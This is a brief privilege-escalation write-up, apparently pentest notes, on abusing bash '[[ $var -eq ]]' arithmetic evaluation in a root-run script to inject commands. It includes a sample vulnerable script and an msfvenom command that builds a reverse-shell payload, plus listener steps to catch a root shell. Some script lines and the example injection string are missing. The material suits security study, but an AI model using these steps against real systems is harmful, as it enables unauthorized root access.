Please see this post for details.
If we can execute above command as root, and the /opt/
contains the numeric comparison such as [[ $var -eq 42 ]]
, we can execute arbitrary command.
read -rp "Enter guess: " num
if [[ $num -eq 42 ]]
echo "Correct"
echo "Wrong"
To execute arbitrary command, answer this question as below.
inject arbitrary command before the correct number (42).
Exploitation (Get a Shell Directly)
It’s easy if we can execute the bash script as root.
We only need to insert /bin/sh
or /bin/bash
command in the answer.
Exploitation (Get a Shell Indirectly)
We can also inject a bash script and execute arbitrary code.
First, create a reverse shell script /tmp/shell.elf
using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4444 -f elf -o /tmp/shell.elf
chmod +x /tmp/shell.elf
Then start a listener in local machine.
Now execute the bash script as root.
We should get a root shell in local terminal.